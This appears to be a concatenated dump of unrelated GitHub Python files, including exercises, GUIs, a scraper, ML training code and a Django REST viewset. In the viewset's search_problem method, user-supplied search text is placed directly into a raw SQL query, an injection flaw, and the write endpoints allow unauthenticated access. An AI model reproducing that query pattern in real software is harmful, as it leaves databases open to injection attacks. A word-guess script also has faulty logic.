max_sum\n\nif __name__ == '__main__':\n arr = []\n #Example for input:\n # 1 1 1 0 0 0\n # 0 1 0 0 0 0\n # 1 1 1 0 0 0\n # 0 0 2 4 4 0\n # 0 0 0 2 0 0\n # 0 0 1 2 4 0\n for _ in range(6):\n arr.append(list(map(int, input().rstrip().split())))\n\n # result = hourglassSum(arr)\n result = hourglass_sum(arr)\n print(\"result: \",result)\n\n","repo_name":"SmithC3k56/GiaiThuat","sub_path":"data_structor/hour_glass.py","file_name":"hour_glass.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34809519289","text":"from tkinter import *\nfrom .registrar import registrarEstudiante\nfrom .editar import editarEstudiante\nfrom .eliminar import eliminarEstudiante\ndef menuEstudiante():\n \n y2 = Frame()\n y2.config(background = \"#213141\")\n y2.place(x=0, y=0, width=500, height=1000)\n y3 = Label(y2, text=\"REGISTRAR ESTUDIANTE\",bg='black', fg='white', width=25, font=(\"bold\", 22))\n y3.place(x=40, y=60)\n #y3.pack(fill=X)\n \n Button(y2, text='CREAR ESTUDIANTE', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=registrarEstudiante).place(x=70, y=130)\n Button(y2, text='EDITAR ESTUDIANTE', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=editarEstudiante).place(x=70, y=180)\n Button(y2, text='BORRAR ESTUDIANTE', width=50,padx = 10, pady = 10, bg=\"black\", fg='white',command=eliminarEstudiante).place(x=70, y=230)\n Button(y2, text='RETURN', width=40, bg=\"#cd5656\", fg='white', command=lambda:[y2.destroy()]).place(x=115, y=280)","repo_name":"dgonzalezt2/MSSQL_with_PythonGUI","sub_path":"GUI/views/student/vistaPrincipal.py","file_name":"vistaPrincipal.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8281704909","text":"#!/usr/bin/env python\n# -- coding: utf-8 --\n\"\"\"\n\"\"\"\nimport json\nfrom datetime import datetime\n\n\nfrom django.http.request import HttpRequest\nfrom django.db.transaction import TransactionManagementError\nfrom django.core.exceptions import ObjectDoesNotExist, FieldError\nfrom django.db import transaction, DatabaseError, OperationalError, IntegrityError, Error\nfrom django.http import JsonResponse\n\n\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_500_INTERNAL_SERVER_ERROR, HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_200_OK, HTTP_404_NOT_FOUND\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.renderers import JSONRenderer\n# from rest_framework_xml.renderers import XMLRenderer\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\n\n\nfrom django.core.files.base import ContentFile\n\nfrom helpers.models import Category, Problem, Media\nfrom helpers.serializers import (SaveProblemSerializer, AddCategorySerializer,\n AllCategorySerializer, ProblemCategorySerializer,\n ProblemSerializer, SearchSerializer)\n\n\nimport base64\n\n\n# format, imgstr = data.split(';base64,')\n# ext = format.split('/')[-1]\n\n# data = ContentFile(base64.b64decode(imgstr), name='temp.' + ext) # You can save this as file instance.\n\nclass CatId(Exception):\n pass\n\nclass NotField(Exception):\n pass\n\n\n\nclass ControlerViewSet(ViewSet):\n \"\"\" Супер класс преставления \"\"\"\n permission_classes = (AllowAny,)\n renderer_classes = (JSONRenderer, )\n read_only = True\n\n\n\n def error_resp(self, error, message='Ошибка', status=HTTP_400_BAD_REQUEST):\n error_dict = {'error': message}\n # print(error) #это в логи себе закинуть TODO\n self.resp = JsonResponse(error_dict, status=status)\n self.resp.headers['Content-Type'] = 'application/json; charset=utf-8'\n return self.resp\n\n def decor_error(fn):\n \"\"\"декоратор отлова ошибок\"\"\"\n def wraper(self, *args, **kwargs):\n try:\n n = fn(self, *args, **kwargs)\n if n:\n return Response(n, status=HTTP_201_CREATED)\n else:\n return Response(status=HTTP_201_CREATED)\n\n except TransactionManagementError as e: # поднимается для любых и всех проблем, связанных с транзакциями базы данных.\n return self.error_resp(e, 'Ошибка', HTTP_400_BAD_REQUEST)\n except DatabaseError as e:\n return self.error_resp(e, f'{str(e)} ошибка бд', HTTP_400_BAD_REQUEST)\n except IndexError as e:\n return self.error_resp(e, f'{str(e)} ошибка бд', HTTP_400_BAD_REQUEST)\n except FieldError as e: #Исключение FieldError вызывается, если существует проблема с полем модели.\n return self.error_resp(e, f'{str(e)} ошибка в запрашиваемых полях', status=HTTP_400_BAD_REQUEST )\n except ValidationError as e:\n return self.error_resp(e, f'Ошибка валидации {str(e)}', HTTP_400_BAD_REQUEST)\n except Error as e: #Основная для ошибок связанных с бд\n return self.error_resp(e, f'Ошибка в бд {str(e)}', status=HTTP_400_BAD_REQUEST )\n except NotField as e:\n return self.error_resp(e, \"Поля name, text, html_page, user, category обязательны к заполнению\", status=HTTP_400_BAD_REQUEST)\n except AttributeError as e:\n return self.error_resp(e, f\"Ошибка {str(e)}\", status=HTTP_400_BAD_REQUEST )\n except ConnectionError as e: #Базовый класс для проблем, связанных с подключением.\n return self.error_resp(e, f'{str(e)} Проблемы с подключением', status=HTTP_400_BAD_REQUEST )\n except RuntimeError as e:\n return self.error_resp(e, f'{str(e)} Проблемы с подключением', status=HTTP_400_BAD_REQUEST )\n except Exception as e:\n print(e)\n return self.error_resp(e, f'{str(e)} Ошибка', status=HTTP_400_BAD_REQUEST )\n return wraper\n\n\n\n @decor_error\n def add_problem(self, request: HttpRequest, *args, **kwargs):\n \"\"\" post запрос для добавления ответа\"\"\"\n serializer = SaveProblemSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n with transaction.atomic():\n data = serializer.validated_data\n\n name = data.get('name', '').capitalize()\n text = data.get('text', '')\n html_page = data.get('html_page', '')\n user = data.get('user', 1)\n category = data.get('category', [])\n\n if name==\"\" or text==\"\" or html_page==\"\" or user==\"\" or category==[]:\n raise NotField\n\n problem = Problem()\n problem.name = name\n problem.text = text\n problem.html_page = html_page\n problem.user = user\n problem.save()\n\n for i in category: #добавление категорий\n problem.category.add(i)\n\n for i in data.get('problem_media', []):\n media = Media()\n media.problem = problem\n data = i.get(\"image\")\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n media.type_file = ext\n res = ContentFile(base64.b64decode(imgstr), name=f'{problem.id}.{ext}')\n media.image_path = res\n media.image = data\n media.save()\n return\n\n\n @decor_error\n def update_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n \"\"\"post запрос обновления записи из отображения\"\"\"\n serializer = SaveProblemSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n with transaction.atomic():\n data = serializer.validated_data\n problem = Problem.objects.get(pk=problem_pk)\n\n name = data.get('name', '').capitalize()\n text = data.get('text', '')\n html_page = data.get('html_page', '')\n user = data.get('user', 1)\n category = data.get('category', [])\n\n problem.name = name\n problem.text = text\n problem.html_page = html_page\n problem.user = user\n problem.save()\n\n\n problem.category.clear()\n\n if name==\"\" or text==\"\" or html_page==\"\" or user==\"\" or category==[]:\n raise NotField\n\n for i in category:\n problem.category.add(i)\n\n for i in data.get('problem_media', []):\n media = Media()\n media.problem = problem\n data = i.get(\"image\")\n format, imgstr = data.split(';base64,')\n ext = format.split('/')[-1]\n media.type_file = ext\n res = ContentFile(base64.b64decode(imgstr), name=f'{problem.id}.{ext}')\n media.image_path = res\n media.save()\n return\n\n\n @decor_error\n def delete_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n \"\"\"post запрос удаления записи из отображения\"\"\"\n snippet = Problem.objects.get(pk=problem_pk)\n snippet.is_published = False\n snippet.save()\n return\n\n\n @decor_error\n def delete_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n \"\"\"post запрос удаления категории из отображения\"\"\"\n snippet = Category.objects.get(pk=category_pk)\n for i in snippet.problem_set.all():\n if i.category.count()==1:\n i.is_published=False\n i.save()\n snippet.delete()\n return\n\n\n @decor_error\n def delete_image(self, request: HttpRequest, image_pk: int, *args, **kwargs):\n \"\"\"post запрос удаления картинки из отображения\"\"\"\n snippet = Media.objects.get(pk=image_pk)\n snippet.delete()\n return\n\n\n @decor_error\n def add_category(self, request: HttpRequest, *args, **kwargs):\n \"\"\"post добавление категории\"\"\"\n serializer = AddCategorySerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n try:\n cat = Category.objects.get(cat_name=data.get(\"cat_name\"))\n except Category.DoesNotExist as e:\n cat = Category()\n cat.cat_name = data.get(\"cat_name\").capitalize()\n cat.save()\n return cat.id\n\n\n @decor_error\n def update_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n serializer = AddCategorySerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n cat = Category.objects.get(pk=category_pk)\n cat.cat_name = data.get(\"cat_name\", \"\").capitalize()\n cat.save()\n return\n\n\n\n # @decor_error #с пагинацией\n # def all_category(self, request: HttpRequest, *args, **kwargs):\n # records = Category.objects.all().order_by('cat_name')\n # pagination = PageNumberPagination()\n # qs = pagination.paginate_queryset(records, request)\n # serializer = AllCategorySerializer(qs, many=True)\n # return pagination.get_paginated_response(serializer.data).data\n\n @decor_error\n def all_category(self, request: HttpRequest, *args, **kwargs):\n records = Category.objects.all().order_by('cat_name')\n serializer = AllCategorySerializer(records, many=True)\n return serializer.data\n\n\n\n\n#path('problem/category/', ControlerViewSet.as_view({\"post\":\"problem_category\"})), #Вывод проблем определённой категории\n\n\n @decor_error\n def problem_category(self, request: HttpRequest, category_pk: int, *args, **kwargs):\n \"\"\"проблемы категории с пагинацией\"\"\"\n problem = Problem.objects.all().order_by('-time_update').filter(category=category_pk, is_published=True)\n pagination = PageNumberPagination()\n qs = pagination.paginate_queryset(problem, request)\n serializer = ProblemCategorySerializer(qs, many=True)\n return pagination.get_paginated_response(serializer.data).data\n\n\n @decor_error\n def view_problem(self, request: HttpRequest, problem_pk: int, *args, **kwargs):\n problem = Problem.objects.get(pk=problem_pk)\n if problem.is_published == True:\n serializer = ProblemSerializer(problem, many=False)\n return serializer.data\n raise FieldError\n\n\n\n @decor_error\n def all_problem(self, request: HttpRequest, *args, **kwargs):\n problem = Problem.objects.all()\n serializer = ProblemCategorySerializer(problem, many=True)\n return serializer.data\n\n\n\n @decor_error\n def search_problem(self, request: HttpRequest, *args, **kwargs):\n serializer = SearchSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n data = serializer.validated_data\n search_text = data.get(\"search\", \"\")\n\n records = Problem.objects.raw(f\"\"\"select hp.*\n from helpers_problem hp\n where to_tsvector('russian', \"name\") || to_tsvector('russian', \"text\") @@ plainto_tsquery('{search_text}')\n ORDER BY ts_rank(to_tsvector('russian', \"text\"), plainto_tsquery('{search_text}')), ts_rank(to_tsvector('russian', \"name\"), plainto_tsquery('{search_text}')), time_create desc;\"\"\")\n pagination = PageNumberPagination()\n qs = pagination.paginate_queryset(records, request)\n serializer = ProblemCategorySerializer(qs, many=True)\n return pagination.get_paginated_response(serializer.data).data\n","repo_name":"MiLara8888/helpers","sub_path":"helpers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32896116726","text":"import gmplot\n\n#gmap = gmplot.GoogleMapPlotter(57.7, 11.9, 16)\n#gmap.scatter(ADAM[0], ADAM[1], 'k', size=40, marker=True)\n# lats = get_latitudes(apartment_list)\n# longs = get_longitudes(apartment_list)\n# print(longs[0])\n# gmap.plot(lats, longs, 'cornflowerblue', edge_width=10)\n# gmap.scatter(more_lats, more_lngs, '#3B0B39', size=40, marker=False)\n# gmap.scatter(lats, longs, 'k', marker=True)\n\n#gmap.heatmap(ADAM[0], ADAM[1])\n#gmap.draw(\"mymap.html\")\n\ndef scatter_apts(gmap, apartment_list):\n\n i = 0\n for apt in apartment_list:\n long = apt.location.longitude\n lat = apt.location.latitude\n tmp = list(zip([int(float(lat)* 10**5)/(10**5), int(float(long)*10**5)/(10**5)]))\n title_str = \"apt\"+str(i)\n\n gmap.apt_scatter(tmp[0], tmp[1], title = title_str, content = apt, c = '#E9967A', size=40, marker=True)\n i=i+1\n\n# var infowindow = new google.maps.InfoWindow({ content: contentString });\n# var\n# marker = new\n# google.maps.Marker({\n# position: uluru,\n# map: map,\n# title: 'Uluru (Ayers Rock)'\n# });\n# marker.addListener('click', function()\n# {\n# infowindow.open(map, marker);\n# });\n\n return gmap","repo_name":"wilhelmssonjens-zz/hittahem","sub_path":"drawmap.py","file_name":"drawmap.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25715452428","text":"def fizzBuzz(n: int):\n\n answer = []\n\n for i in range(1,n+1):\n if i%15 == 0:\n answer.append(\"FizzBuzz\")\n elif i%3 ==0:\n answer.append(\"Fizz\")\n elif i%5 == 0:\n answer.append(\"Buzz\")\n else:\n answer.append(str(i))\n\n\n return answer\n\n#another way\n#return ['FizzBuzz' if i%15 == 0 else 'Buzz' if i%5 == 0 else 'Fizz' if i%3 == 0 else str(i) for i in range(1,n+1)]\n\n#main\nN = int(input(\"Enter the n : \"))\nprint(fizzBuzz(N))","repo_name":"Hana-esf/LeetCode","sub_path":"python/4_FizzBuzz.py","file_name":"4_FizzBuzz.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30080044676","text":"import random\nfrom requests_html import HTMLSession\nfrom datetime import date\nfrom time import time, sleep\n\n\nt1 = time()\n\n\nparsed_date = 1000\n\n\ndef serp_parser(key, domain='py4you.com', a=100, b=1000):\n\n global parsed_date\n\n parsed_date = parsed_date + 10010\n\n print('Send request:', key)\n\n with HTMLSession() as session:\n try:\n resp = session.get(\n f'https://www.google.com/search?q={key}&num=100&hl=en')\n if resp.status_code != 200:\n raise ValueError('Status code is not 200')\n links = resp.html.xpath('//div[@class=\"r\"]/a[1]/@href')\n found = 'not_found'\n except Exception as e:\n print(type(e), e)\n links = []\n found = 'ban_google'\n\n result = [parsed_date, key, found, '-']\n\n for position, url in enumerate(links, 1):\n if domain in url:\n result = [parsed_date, key, url, position]\n\n return result, 'blabla', 'data', 'url'\n\n\nt2 = time()\n\n\nmy_position1 = serp_parser('python for seo')\nmy_position2 = serp_parser('python for you')\nmy_position3 = serp_parser('заказать seo')\n\n\n# data = ('купить seo', 'rozetka.com.ua', 1001)\n\ndata = {\n 'key': 'купить seo',\n 'domain': 'rozetka.com.ua',\n 'a': 1000\n}\n\n\n# my_position4 = serp_parser(data[0], data[1], data[2], data[3])\n\nmy_position4 = serp_parser(**data)\n\nprint(f'All done!')\n\nprint(my_position1)\nprint(my_position2)\nprint(my_position3)\nprint(my_position4)\n\nprint('Working time is: ', round(t2-t1, 4), ' seconds')\n\nprint(parsed_date)\n","repo_name":"vvscode/py--notes","sub_path":"py4seo/Код с занятий/lesson5/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27125555714","text":"#This is A Word Guess Game!\nprint('====THIS IS A WORD GUESS GAME====')\nimport random\n\nwords = ['beautiful', 'handsome', 'pretty', 'smart', 'eloquent']\nguess = input('Guess the word i am thinking of: (beautiful/handsome/pretty/smart/eloquent)')\n\nif random.choice(words) == guess:\n print('Correct!')\nelse:\n count = 0\n while count < 3:\n print(' Wrong! Try again')\n count = count + 1\n else: \n \n print('Sorry, Wrong! The correct answer is', random.choice(words))\n\n","repo_name":"biodunduro/switch_biodun","sub_path":"Assignment_Guess_Word_extended.py","file_name":"Assignment_Guess_Word_extended.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818455272","text":"from typing import List\nfrom PyQt5.QtCore import QThread\nfrom pandas import DataFrame\n\nfrom src.converters.degrees2coordinates_converter import DegreesToCoordinatesConverter\nfrom src.converters.degrees_converter import DegreesConverter\nfrom src.converters.reference_converter import ReferenceConverter\nfrom src.converters.sonarplan_converter import SonarPlanConverter\nfrom src.converters.sonic_converter import SonicConverter\nfrom src.converters.time_converter import TimeConverter\nfrom src.converters.yards2coordinates_converter import IConverter, YardsToCoordinatesConverter\nfrom src.converters.yards_to_nm_converter import YardsToNMConverter\nfrom src.tasks.TaskBase import TaskBase\nfrom src.types import MerData\nfrom src.utility import get_exception\nimport numpy as np\n\nfrom src.log import get_logger\n\nconverters = [\n TimeConverter(),\n SonicConverter(),\n DegreesConverter(),\n YardsToNMConverter(),\n SonarPlanConverter(),\n YardsToCoordinatesConverter(),\n DegreesToCoordinatesConverter(),\n ReferenceConverter()\n]\n\n\nclass ConvertTask(TaskBase):\n logger = get_logger(__name__)\n\n def __init__(self, data: MerData):\n QThread.__init__(self)\n self.data: MerData = data\n\n # add converters\n # order does matter\n self.converters: List[IConverter] = list()\n self.init_converters()\n\n def run(self) -> None:\n try:\n self.emit_busy('Start convert')\n self.convert()\n except Exception as e:\n self.emit_failed('Convert failed: ' + get_exception(e))\n\n def convert(self) -> None:\n self.emit_busy('Converting data')\n\n data = self.data.copy()\n # hold tactical scenario\n tact_scenario: DataFrame = data['TACTICAL_SCENARIO'].original_df\n\n for converter in self.converters:\n # apply all converters to each model of the MerData object\n for name, dfm in data.items():\n # get scientific cols because only numeric cols will be converted\n scientific_cols: List[str] = dfm.original_df.select_dtypes(include=np.number).columns.tolist()\n\n converted_df: DataFrame = converter.convert(\n dfm.original_df,\n name=dfm.name,\n tact_scenario=tact_scenario,\n scientific_cols=scientific_cols\n )\n data[name].original_df = converted_df\n data[name].rename_columns()\n\n self.emit_busy('Convert success')\n self.task_finished.emit(data)\n\n def add_converter(self, c: IConverter) -> None:\n self.converters.append(c)\n\n def init_converters(self):\n for c in converters:\n self.add_converter(c)\n","repo_name":"jooppoelman/mer.io","sub_path":"src/tasks/convert_task.py","file_name":"convert_task.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27314237700","text":"from tqdm import tqdm\nimport torch.nn as nn\nimport torch.optim as optim\nfrom unet import UNET\nfrom segnet import SegNet\nfrom loss import DiceLoss,SSIMLoss\nfrom utils import (\n load_checkpoint,\n save_checkpoint,\n get_loaders,\n check_accuracy,\n)\nfrom config import *\nimport cv2\nimport numpy as np\n\ndef train_fn(loader, model, optimizer, loss_fn, scaler):\n loop = tqdm(loader)\n\n for batch_idx, (data, targets) in enumerate(loop):\n data = data.to(device=DEVICE)\n targets = targets.float().unsqueeze(1).to(device=DEVICE)\n # targets = targets.float().permute(0,3,1,2).to(device=DEVICE)\n\n # forward\n with torch.cuda.amp.autocast():\n predictions = model(data)\n loss = loss_fn(predictions, targets)\n #for which photos the model predicted wrong ?\n if loss.item()>1.0:\n image=data.squeeze(0).permute(1,2,0).cpu()*255\n image=np.array(image,dtype=np.uint8)\n\n pred=nn.functional.sigmoid(predictions).squeeze(0).squeeze(0).detach().cpu()*255\n pred=np.array(pred,dtype=np.uint8)\n\n targets=targets.squeeze(0).squeeze(0).detach().cpu()*255\n targets=np.array(targets,dtype=np.uint8)\n\n cv2.imshow(\"pred\",pred)\n cv2.imshow(\"targets\",targets)\n cv2.imshow(\"image\",image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n # backward\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n # update tqdm loop\n loop.set_postfix(loss=loss.item())\ndef main():\n model = UNET(in_channels=3, out_channels=1).to(DEVICE)\n loss_fn = DiceLoss().to(DEVICE)\n optimizer = optim.Adam(model.parameters(), lr=LEARNING_RATE,weight_decay=WEIGHT_DECAY)\n\n if LOAD_MODEL:\n load_checkpoint(torch.load(\"checkpoint40.pth.tar\"), model)\n\n\n train_loader ,val_loader= get_loaders(\n train_img_dir=TRAIN_IMG_DIR,\n train_mask_dir=TRAIN_MASK_DIR,\n test_img_dir=VAL_IMG_DIR,\n test_mask_dir=VAL_MASK_DIR,\n batch_size=1,\n train_transform=train_transform,\n val_transform=val_transforms,\n num_workers=NUM_WORKERS,\n pin_memory=PIN_MEMORY,\n )\n # check_accuracy(val_loader, model, device=DEVICE)\n scaler = torch.cuda.amp.GradScaler()\n\n for epoch in range(NUM_EPOCHS):\n\n train_fn(train_loader, model, optimizer, loss_fn, scaler)\n\n if epoch % 5==0:\n # save model\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n }\n if SAVE_MODEL:\n save_checkpoint(checkpoint)\n # check accuracy\n check_accuracy(val_loader, model, device=DEVICE)\n\nif __name__ == \"__main__\":\n main()","repo_name":"bonj4/Segmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40944887342","text":"#!/usr/bin/env python\n\nimport os\nimport wx\nimport wx.gizmos as gizmos\nimport csv\n\n\nclass MainWindow(wx.Frame):\n\n def __init__(self, parent, title):\n wx.Frame.__init__(self, parent, title=title, size=(200, 100))\n self.CreateStatusBar() # A StatusBar in the bottom of the window\n\n # Setting up the menu.\n filemenu = wx.Menu()\n\n # wx.ID_ABOUT and wx.ID_EXIT are standard ids provided by wxWidgets.\n menuOpen = filemenu.Append(wx.ID_OPEN, \"&Open\", \" Open a file to edit\")\n menuSave = filemenu.Append(\n wx.ID_SAVE, \"&Save\", \" Save the current file\")\n menuAbout = filemenu.Append(\n wx.ID_ABOUT, \"&About\", \" Information about this program\")\n menuExit = filemenu.Append(\n wx.ID_EXIT, \"E&xit\", \" Terminate the program\")\n\n # Creating the menubar.\n menuBar = wx.MenuBar()\n # Adding the \"filemenu\" to the MenuBar\n menuBar.Append(filemenu, \"&File\")\n self.SetMenuBar(menuBar) # Adding the MenuBar to the Frame content.\n\n # Set events.\n self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)\n self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)\n # self.Bind(wx.EVT_MENU, self.OnSave, menuSave)\n self.Bind(wx.EVT_MENU, self.OnExit, menuExit)\n\n self.Show(True)\n\n def OnOpen(self, e):\n self.dirname = ''\n dlg = wx.FileDialog(\n self, \"Choose a file\", self.dirname, \"\", \"*.*\", wx.OPEN)\n if dlg.ShowModal() == wx.ID_OK:\n self.filename = dlg.GetFilename()\n self.dirname = dlg.GetDirectory()\n\n with open(os.path.join(self.dirname, self.filename), 'r') as f:\n r = csv.reader(f)\n names, stockeds = [], []\n for i, row in enumerate(r):\n names.append(row[0])\n stockeds.append(bool(int(row[1])))\n\n # cb = wx.CheckBox(self, pos=(5, 20*i))\n # nb = wx.StaticText(self, pos=(50, 20*i), label=name)\n # cb.SetValue(stocked)\n # self.controls.append(cb)\n # # self.cl = wx.CheckListBox(self, pos=(5, 20), choices=names)\n # for i in range(len(stockeds)):\n # if stockeds[i]:\n # self.cl.Check(i)\n\n self.tree = gizmos.TreeListCtrl(self, -1, style=\n wx.TR_DEFAULT_STYLE\n #| wx.TR_HAS_BUTTONS\n #| wx.TR_TWIST_BUTTONS\n #| wx.TR_ROW_LINES\n #| wx.TR_COLUMN_LINES\n #| wx.TR_NO_LINES\n | wx.TR_FULL_ROW_HIGHLIGHT\n )\n\n # create some columns\n self.tree.AddColumn(\"Main column\")\n self.tree.AddColumn(\"Column 1\")\n self.tree.AddColumn(\"Column 2\")\n self.tree.SetMainColumn(0) # the one with the tree in it...\n self.tree.SetColumnWidth(0, 175)\n\n self.root = self.tree.AddRoot(\"The Root Item\")\n self.tree.SetItemText(self.root, \"col 1 root\", 1)\n self.tree.SetItemText(self.root, \"col 2 root\", 2)\n\n for x in range(15):\n txt = \"Item %d\" % x\n child = self.tree.AppendItem(self.root, txt)\n self.tree.SetItemText(child, txt + \"(c1)\", 1)\n self.tree.SetItemText(child, txt + \"(c2)\", 2)\n\n for y in range(5):\n txt = \"item %d-%s\" % (x, chr(ord(\"a\") + y))\n last = self.tree.AppendItem(child, txt)\n self.tree.SetItemText(last, txt + \"(c1)\", 1)\n self.tree.SetItemText(last, txt + \"(c2)\", 2)\n\n for z in range(5):\n txt = \"item %d-%s-%d\" % (x, chr(ord(\"a\") + y), z)\n item = self.tree.AppendItem(last, txt)\n self.tree.SetItemText(item, txt + \"(c1)\", 1)\n self.tree.SetItemText(item, txt + \"(c2)\", 2)\n\n self.tree.Expand(self.root)\n\n # self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\n # self.tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnActivate)\n\n dlg.Destroy()\n\n def OnAbout(self, e):\n # A message dialog box with an OK button. wx.OK is a standard ID in\n # wxWidgets.\n dlg = wx.MessageDialog(\n self, \"A small text editor\", \"About Sample Editor\", wx.OK)\n dlg.ShowModal() # Show it\n dlg.Destroy() # finally destroy it when finished.\n\n def OnExit(self, e):\n self.Close(True) # Close the frame.\n\napp = wx.App(False)\nframe = MainWindow(None, \"Sample editor\")\napp.MainLoop()\n","repo_name":"eddiejessup/proja","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13036218125","text":"#\n# Prelab6Ejercicio2.py\n#\n# DESCRIPCION: Ejercicio del Prelaboratorio 5 modificado con un subprograma para los calculos.\n# El programa calcula la suma de los factoriales de 0 a N. \n#\n# Autor:\n# Rosseline Rodriguez\n#\n# Ultima modificacion: 24/02/2018\n\nimport sys\n\n# SUBPROGRAMAS\n\n# Definicion del cuantificador productoria\ndef prod( iterable ):\n\tp = 1\n\tfor n in iterable:\n\t\tp *= n\n\treturn p\n\ndef sumaFactoriales(N: int) -> int:\n# ENTRADAS: N // limite de la suma de factoriales\n# SALIDAS: suma // valor de la suma de factoriales\n# PRE: N >= 0\n# POST: suma == sum ( prod( j for j in range(1,i+1) ) for i in range(0,N+1) )\n\n# Variables locales: \n# fact : int // auxiliar para el calculo del factorial \n# cota : int // valor de la cota del ciclo\n# k : int // variable de control del ciclo\n\n try: \n # Precondicion: valor de N positivo\n assert(N >= 0)\n except:\n print(\"La precondicion no se cumple: valor negativo \")\n print(\"El programa terminara\")\n sys.exit()\n\t \n suma,fact,k = 0,1,0\n cota = N + 1 - k\n\n # Verificacion de invariante al inicio del ciclo\n try:\n assert(0<=k<=N+1 and (fact == prod( j for j in range(1,k) ) ) and suma == sum( prod( j for j in range(1,i+1) ) for i in range(0,k) ) )\n except:\n print(\"Hubo un error en el invariante para los siguientes valores\")\n print(\"k=\"+str(k)+\" fact=\"+str(fact)+\" suma=\"+str(suma))\n print(\"El programa terminara\")\n sys.exit()\n\n\t \n #Verificacion de la cota al inicio\n try:\n assert(cota >= 0)\n except:\n print(\"Error: cota negativa. El programa terminara \")\n print(\"cota=\"+str(cota))\n sys.exit()\n\n while(k<=N):\n if( k>0 ):\n fact = fact*k\n else:\n pass\n suma = suma+fact\n k = k + 1\n\t\n #Verificacion de invariante en cada iteracion\n try:\n assert( \n 0<=k<=N+1 and fact == prod ( j for j in range(1,k) ) and suma == sum ( prod ( j for j in range(1,i+1) ) for i in range(0,k) ) \n )\n except:\n print(\"Hubo un error en el invariante para los siguientes valores\")\n print(\"k=\"+str(k)+\" fact=\"+str(fact)+\" suma=\"+str(suma))\n print(\"El programa terminara\")\n sys.exit()\n \n #Verificacion de cota decreciente en cada iteracion\t \n try:\n assert(cota > N+1-k) \n except:\n print(\"Error: cota no decreciente. El programa terminara \")\n print(\"cota anterior =\"+str(cota)+\" nueva cota =\"+str(N-k+1))\n sys.exit()\n\n cota = N+1 - k\n #Verificacion de la cota no negativa en cada iteracion\n try:\n assert(cota >= 0)\n except:\n print(\"Error: cota negativa. El programa terminara \")\n print(\"cota=\"+str(cota))\n sys.exit()\n\n # Postcondicion:\n assert( suma == sum ( prod( j for j in range(1,i+1) ) for i in range(0,N+1) ) )\n\n return (suma)\n# FIN de sumaFactoriales\n\n# PROGRAMA PRINCIPAL\n \n# Variables: \n# N : int // ENTRADA: natural que limita la suma\n# suma : int // SALIDA: suma de los factoriales\n\n# Valores iniciales:\nwhile (True):\n N = int(input(\"Introduzca un entero positivo: \"))\n\n # Precondicion: se verifica la pre porque se hace programacion robusta\n try:\n assert(N >= 0)\n break\n except:\n print(\"La precondicion no se cumple: valor negativo \")\n print(\"Vuelva a intentar\")\n\n# Calculos\nsuma = sumaFactoriales(N)\n\n# Aquí no se verifica la post. Ya se verifico en el subprograma.\n# Es muy sencillo el codigo del programa principal seria redundante\n\n# Salida:\nprint(\"la suma de los factoriales de cero a\", N ,\"es:\")\nprint(suma)\n\n# FIN DEL PROGRAMA PRINCIPAL","repo_name":"mfaria724/CI2691-lab-algoritmos-1","sub_path":"Laboratorio 06/PreLaboratorio/Soluciones/Prelab6ejercicio2.py","file_name":"Prelab6ejercicio2.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1940826146","text":"import argparse\nimport uvicorn\nfrom fastapi import FastAPI\n\napp = FastAPI()\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", type=str, required=True, help=\"Name of the user\")\n\n@app.get(\"/\")\nasync def index(name: str):\n return {\"message\": 